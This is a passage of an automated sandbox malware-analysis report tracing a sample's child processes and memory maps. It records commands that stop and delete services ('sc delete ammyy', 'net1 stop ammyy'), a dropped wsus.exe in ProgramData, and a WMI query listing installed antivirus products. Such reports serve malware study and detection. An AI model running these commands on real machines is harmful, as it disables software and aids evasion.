ntdll.dll 0x773f0000 0x77598fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x775d0000 0x7774ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Host Behavior
File (10)
Operation Filename Additional Information Success Count Logfile
Get Info STD_ERROR_HANDLE type = file_type True 4
Write STD_ERROR_HANDLE size = 30 True 1
Write STD_ERROR_HANDLE size = 2 True 2
Write STD_ERROR_HANDLE size = 52 True 1
Module (3)
Operation Module Additional Information Success Count Logfile
Load NETMSG base_address = 0x73d90000 True 1
Get Handle c:\windows\syswow64\net1.exe base_address = 0x80000 True 1
Get Filename - process_name = c:\windows\syswow64\net1.exe, file_name_orig = C:\Windows\SysWOW64\net1.exe, size = 260 True 1
Service (2)
Operation Additional Information Success Count Logfile
Get Service Name database_name = SERVICES_ACTIVE_DATABASE False 1
Open Manager database_name = SERVICES_ACTIVE_DATABASE True 1
System (2)
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 1627-02-02 21:37:13 (UTC) True 1
Get Time type = Ticks, time = 10927261 True 1
Process #17: sc.exe
8 0
Information Value
ID #17
File Name c:\windows\syswow64\sc.exe
Command Line sc delete foundation
Initial Working Directory C:\Users\qj4SUKboE\Desktop\
Monitor Start Time: 00:01:14, Reason: Child Process
Unmonitor End Time: 00:02:38, Reason: Terminated by Timeout
Monitor Duration 00:01:24
OS Process Information
Information Value
PID 0x938
Parent PID 0xbc0 (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username EXB9WSP\qj4SUKboE
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 768
0x 8F0
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
sc.exe 0x00030000 0x0003bfff Memory Mapped File Readable, Writable, Executable True False False -
private_0x0000000000040000 0x00040000 0x00041fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000040000 0x00040000 0x00046fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00050000 0x00050fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000060000 0x00060000 0x00063fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000070000 0x00070000 0x00070fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000080000 0x00080000 0x00081fff Pagefile Backed Memory Readable, Writable True False False -
sc.exe.mui 0x00090000 0x0009ffff Memory Mapped File Readable, Writable False False False -
private_0x00000000000d0000 0x000d0000 0x0014ffff Private Memory Readable, Writable True False False -
private_0x0000000000160000 0x00160000 0x0019ffff Private Memory Readable, Writable True False False -
locale.nls 0x001a0000 0x00206fff Memory Mapped File Readable False False False -
private_0x0000000000240000 0x00240000 0x0027ffff Private Memory Readable, Writable True False False -
private_0x00000000002d0000 0x002d0000 0x003cffff Private Memory Readable, Writable True False False -
kernelbase.dll.mui 0x003d0000 0x0048ffff Memory Mapped File Readable, Writable False False False -
private_0x0000000000540000 0x00540000 0x0054ffff Private Memory Readable, Writable True False False -
wow64win.dll 0x74d90000 0x74debfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74df0000 0x74e2efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74e50000 0x74e57fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75120000 0x7512bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75130000 0x7518ffff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75290000 0x752d5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75440000 0x7554ffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75900000 0x759abfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76e20000 0x76e38fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x76f00000 0x76feffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77130000 0x771cffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000771d0000 0x771d0000 0x772c9fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000772d0000 0x772d0000 0x773eefff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x773f0000 0x77598fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x775d0000 0x7774ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Host Behavior
File (3)
Operation Filename Additional Information Success Count Logfile
Get Info STD_OUTPUT_HANDLE type = file_type True 1
Write STD_OUTPUT_HANDLE size = 98 True 1
Module (1)
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\sc.exe base_address = 0x30000 True 1
Service (2)
Operation Additional Information Success Count Logfile
Open database_name = SERVICES_ACTIVE_DATABASE False 1
Open Manager database_name = SERVICES_ACTIVE_DATABASE True 1
System (2)
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 1627-02-02 21:37:13 (UTC) True 1
Get Time type = Ticks, time = 10927105 True 1
Process #18: net1.exe
17 0
Information Value
ID #18
File Name c:\windows\syswow64\net1.exe
Command Line C:\Windows\system32\net1 stop ammyy
Initial Working Directory C:\Users\qj4SUKboE\Desktop\
Monitor Start Time: 00:01:14, Reason: Child Process
Unmonitor End Time: 00:02:38, Reason: Terminated by Timeout
Monitor Duration 00:01:24
OS Process Information
Information Value
PID 0x744
Parent PID 0x8d8 (c:\windows\syswow64\net.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username EXB9WSP\qj4SUKboE
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 918
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
net1.exe 0x00080000 0x000a9fff Memory Mapped File Readable, Writable, Executable True False False -
locale.nls 0x000b0000 0x00116fff Memory Mapped File Readable False False False -
private_0x0000000000160000 0x00160000 0x0019ffff Private Memory Readable, Writable True False False -
private_0x0000000000200000 0x00200000 0x0020ffff Private Memory Readable, Writable True False False -
private_0x0000000000320000 0x00320000 0x0039ffff Private Memory Readable, Writable True False False -
private_0x00000000004c0000 0x004c0000 0x0053ffff Private Memory Readable, Writable True False False -
private_0x0000000000660000 0x00660000 0x0075ffff Private Memory Readable, Writable True False False -
ntdsapi.dll 0x739f0000 0x73a07fff Memory Mapped File Readable, Writable, Executable False False False -
samlib.dll 0x73a10000 0x73a21fff Memory Mapped File Readable, Writable, Executable False False False -
netapi32.dll 0x73a30000 0x73a40fff Memory Mapped File Readable, Writable, Executable False False False -
netmsg.dll 0x73d90000 0x73d91fff Memory Mapped File Readable, Writable, Executable False False False -
logoncli.dll 0x73db0000 0x73dd1fff Memory Mapped File Readable, Writable, Executable False False False -
dsrole.dll 0x73de0000 0x73de8fff Memory Mapped File Readable, Writable, Executable False False False -
wkscli.dll 0x73e40000 0x73e4efff Memory Mapped File Readable, Writable, Executable False False False -
srvcli.dll 0x73e50000 0x73e68fff Memory Mapped File Readable, Writable, Executable False False False -
samcli.dll 0x73e70000 0x73e7efff Memory Mapped File Readable, Writable, Executable False False False -
browcli.dll 0x73e80000 0x73e8cfff Memory Mapped File Readable, Writable, Executable False False False -
netutils.dll 0x74bb0000 0x74bb8fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74d90000 0x74debfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74df0000 0x74e2efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74e50000 0x74e57fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75120000 0x7512bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75130000 0x7518ffff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75290000 0x752d5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75440000 0x7554ffff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x75670000 0x75675fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75900000 0x759abfff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x75cc0000 0x75cf4fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76e20000 0x76e38fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x76f00000 0x76feffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77130000 0x771cffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000771d0000 0x771d0000 0x772c9fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000772d0000 0x772d0000 0x773eefff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x773f0000 0x77598fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x775d0000 0x7774ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Host Behavior
File (10)
Operation Filename Additional Information Success Count Logfile
Get Info STD_ERROR_HANDLE type = file_type True 4
Write STD_ERROR_HANDLE size = 30 True 1
Write STD_ERROR_HANDLE size = 2 True 2
Write STD_ERROR_HANDLE size = 52 True 1
Module (3)
Operation Module Additional Information Success Count Logfile
Load NETMSG base_address = 0x73d90000 True 1
Get Handle c:\windows\syswow64\net1.exe base_address = 0x80000 True 1
Get Filename - process_name = c:\windows\syswow64\net1.exe, file_name_orig = C:\Windows\SysWOW64\net1.exe, size = 260 True 1
Service (2)
Operation Additional Information Success Count Logfile
Get Service Name database_name = SERVICES_ACTIVE_DATABASE False 1
Open Manager database_name = SERVICES_ACTIVE_DATABASE True 1
System (2)
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 1627-02-02 21:37:13 (UTC) True 1
Get Time type = Ticks, time = 10927246 True 1
Process #19: sc.exe
8 0
Information Value
ID #19
File Name c:\windows\syswow64\sc.exe
Command Line sc delete ammyy
Initial Working Directory C:\Users\qj4SUKboE\Desktop\
Monitor Start Time: 00:01:14, Reason: Child Process
Unmonitor End Time: 00:02:38, Reason: Terminated by Timeout
Monitor Duration 00:01:24
OS Process Information
Information Value
PID 0xb64
Parent PID 0xb7c (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username EXB9WSP\qj4SUKboE
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x B70
0x 620
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
sc.exe 0x00030000 0x0003bfff Memory Mapped File Readable, Writable, Executable True False False -
private_0x0000000000040000 0x00040000 0x00041fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000040000 0x00040000 0x00046fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00050000 0x00050fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000060000 0x00060000 0x00063fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000070000 0x00070000 0x00070fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00080000 0x000e6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000f0000 0x000f0000 0x000f1fff Pagefile Backed Memory Readable, Writable True False False -
sc.exe.mui 0x00100000 0x0010ffff Memory Mapped File Readable, Writable False False False -
private_0x0000000000120000 0x00120000 0x0015ffff Private Memory Readable, Writable True False False -
private_0x00000000001e0000 0x001e0000 0x0021ffff Private Memory Readable, Writable True False False -
kernelbase.dll.mui 0x00220000 0x002dffff Memory Mapped File Readable, Writable False False False -
private_0x0000000000310000 0x00310000 0x0031ffff Private Memory Readable, Writable True False False -
private_0x00000000003c0000 0x003c0000 0x0043ffff Private Memory Readable, Writable True False False -
private_0x00000000005e0000 0x005e0000 0x006dffff Private Memory Readable, Writable True False False -
wow64win.dll 0x74d90000 0x74debfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74df0000 0x74e2efff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74e50000 0x74e57fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75120000 0x7512bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75130000 0x7518ffff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75290000 0x752d5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75440000 0x7554ffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75900000 0x759abfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76e20000 0x76e38fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x76f00000 0x76feffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77130000 0x771cffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000771d0000 0x771d0000 0x772c9fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000772d0000 0x772d0000 0x773eefff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x773f0000 0x77598fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x775d0000 0x7774ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Host Behavior
File (3)
Operation Filename Additional Information Success Count Logfile
Get Info STD_OUTPUT_HANDLE type = file_type True 1
Write STD_OUTPUT_HANDLE size = 98 True 1
Module (1)
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\syswow64\sc.exe base_address = 0x30000 True 1
Service (2)
Operation Additional Information Success Count Logfile
Open database_name = SERVICES_ACTIVE_DATABASE False 1
Open Manager database_name = SERVICES_ACTIVE_DATABASE True 1
System (2)
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 1627-02-02 21:37:13 (UTC) True 1
Get Time type = Ticks, time = 10927074 True 1
Process #21: wsus.exe
2687 7
Information Value
ID #21
File Name c:\programdata\settings\wsus.exe
Command Line C:\ProgramData\Settings\wsus.exe
Initial Working Directory C:\Users\qj4SUKboE\Desktop\
Monitor Start Time: 00:01:25, Reason: Child Process
Unmonitor End Time: 00:02:38, Reason: Terminated by Timeout
Monitor Duration 00:01:13
OS Process Information
Information Value
PID 0xa40
Parent PID 0x814 (c:\users\qj4suk~1\appdata\local\temp\cmd_.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username EXB9WSP\qj4SUKboE
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x A50
0x B30
0x B44
0x 8E0
0x 8C8
0x 8DC
0x 0
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
wsus.exe 0x00050000 0x000fcfff Memory Mapped File Readable, Writable, Executable True True False
pagefile_0x0000000000100000 0x00100000 0x00103fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000110000 0x00110000 0x00110fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00120000 0x00186fff Memory Mapped File Readable False False False -
private_0x0000000000190000 0x00190000 0x001cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000001d0000 0x001d0000 0x001d0fff Pagefile Backed Memory Readable True False False -
private_0x00000000001e0000 0x001e0000 0x002dffff Private Memory Readable, Writable True False False -
pagefile_0x00000000002e0000 0x002e0000 0x002e0fff Pagefile Backed Memory Readable True False False -
rsaenh.dll 0x002f0000 0x0032bfff Memory Mapped File Readable False False False -
private_0x0000000000360000 0x00360000 0x0036ffff Private Memory Readable, Writable True False False -
private_0x0000000000390000 0x00390000 0x003cffff Private Memory Readable, Writable True False False -
private_0x00000000003d0000 0x003d0000 0x0040ffff Private Memory Readable, Writable True False False -
private_0x0000000000440000 0x00440000 0x004bffff Private Memory Readable, Writable True False False -
private_0x00000000004c0000 0x004c0000 0x004fffff Private Memory Readable, Writable True False False -
private_0x0000000000570000 0x00570000 0x005affff Private Memory Readable, Writable True False False -
private_0x0000000000620000 0x00620000 0x0071ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000720000 0x00720000 0x008a7fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000008b0000 0x008b0000 0x00a30fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000a40000 0x00a40000 0x01e3ffff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x01e40000 0x0210efff Memory Mapped File Readable False False False -
private_0x0000000002110000 0x02110000 0x0228ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002110000 0x02110000 0x021eefff Pagefile Backed Memory Readable True False False -
private_0x0000000002250000 0x02250000 0x0228ffff Private Memory Readable, Writable True False False -
private_0x0000000002290000 0x02290000 0x0238ffff Private Memory Readable, Writable True False False -
private_0x00000000023a0000 0x023a0000 0x0249ffff Private Memory Readable, Writable True False False -
private_0x00000000024a0000 0x024a0000 0x025dffff Private Memory Readable, Writable True False False -
private_0x00000000024a0000 0x024a0000 0x0259ffff Private Memory Readable, Writable True False False -
private_0x00000000025a0000 0x025a0000 0x025dffff Private Memory Readable, Writable True False False -
private_0x00000000025e0000 0x025e0000 0x026affff Private Memory Readable, Writable True False False -
private_0x00000000025e0000 0x025e0000 0x0261ffff Private Memory Readable, Writable True False False -
private_0x0000000002670000 0x02670000 0x026affff Private Memory Readable, Writable True False False -
private_0x0000000002790000 0x02790000 0x0288ffff Private Memory Readable, Writable True False False -
private_0x00000000028c0000 0x028c0000 0x028fffff Private Memory Readable, Writable True False False -
private_0x0000000002900000 0x02900000 0x029fffff Private Memory Readable, Writable True False False -
private_0x0000000002af0000 0x02af0000 0x02beffff Private Memory Readable, Writable True False False -
wtsapi32.dll 0x736f0000 0x736fcfff Memory Mapped File Readable, Writable, Executable False False False -
dbghelp.dll 0x73700000 0x737eafff Memory Mapped File Readable, Writable, Executable False False False -
userenv.dll 0x737f0000 0x73806fff Memory Mapped File Readable, Writable, Executable False False False -
winscard.dll 0x73810000 0x73832fff Memory Mapped File Readable, Writable, Executable False False False -
secur32.dll 0x73840000 0x73847fff Memory Mapped File Readable, Writable, Executable False False False -
fastprox.dll 0x73fa0000 0x74035fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x74040000 0x7407afff Memory Mapped File Readable, Writable, Executable False False False -
wbemcomn.dll 0x74080000 0x740dbfff Memory Mapped File Readable, Writable, Executable False False False -
winsta.dll 0x740b0000 0x740d8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdsapi.dll 0x74bb0000 0x74bc7fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x74bd0000 0x74bdafff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x74cf0000 0x74d02fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74d10000 0x74d8ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74d90000 0x74debfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74df0000 0x74e2efff Memory Mapped File Readable, Writable, Executable False False False -
api-ms-win-core-synch-l1-2-0.dll 0x74e40000 0x74e42fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74e50000 0x74e57fff Memory Mapped File Readable, Writable, Executable False False False -
wbemsvc.dll 0x74e70000 0x74e7efff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x74e80000 0x74e8dfff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x75060000 0x75075fff Memory Mapped File Readable, Writable, Executable False False False -
wbemprox.dll 0x75080000 0x75089fff Memory Mapped File Readable, Writable, Executable False False False -
wshtcpip.dll 0x75090000 0x75094fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x750a0000 0x750dbfff Memory Mapped File Readable, Writable, Executable False False False -
kbdus.dll 0x750d0000 0x750d3fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75120000 0x7512bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75130000 0x7518ffff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75290000 0x752d5fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75300000 0x753cbfff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x753e0000 0x75436fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75440000 0x7554ffff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x75670000 0x75675fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x75820000 0x758a2fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75900000 0x759abfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75c30000 0x75cbefff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x75cc0000 0x75cf4fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x75d10000 0x75e0ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75e10000 0x75e9ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x75ea0000 0x75f3cfff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75f40000 0x7609bfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x760a0000 0x760a9fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76140000 0x76d89fff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x76dc0000 0x76e1ffff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x76e20000 0x76e38fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x76f00000 0x76feffff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77130000 0x771cffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000771d0000 0x771d0000 0x772c9fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000772d0000 0x772d0000 0x773eefff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x773f0000 0x77598fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x775d0000 0x7774ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Host Behavior
COM (3)
Operation Class Interface Additional Information Success Count Logfile
Create WBEMLocator IWbemLocator cls_context = CLSCTX_INPROC_SERVER True 1
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = root\SecurityCenter2 True 1
Execute WBEMLocator IWbemServices method_name = ExecQuery, query_language = WQL, query = SELECT * FROM AntiVirusProduct True 1
File (6)
Operation Filename Additional Information Success Count Logfile
Create KFwsh6767yuhNr3hunjiweh78&*$Y%3uefisgt67yuH*y#$urw share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Create C:\ProgramData\Settings\wsus.exe desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE True 1
Read C:\ProgramData\Settings\wsus.exe size = 1024, size_out = 1024 True 1
Registry (17)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services - True 1
Open Key HKEY_CURRENT_USER\SYSTEM\CurrentControlSet\Control - True 2
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services - False 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services - True 1
Open Key HKEY_CURRENT_USER\SYSTEM\CurrentControlSet\Control - True 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services - True 1
Open Key HKEY_CURRENT_USER\SYSTEM\CurrentControlSet\Control - True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services value_name = netsxuid, data = 0 False 1
Read Value HKEY_CURRENT_USER\SYSTEM\CurrentControlSet\Control value_name = netsxuid, data = 0 False 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services value_name = netsxuid, data = 0 False 1
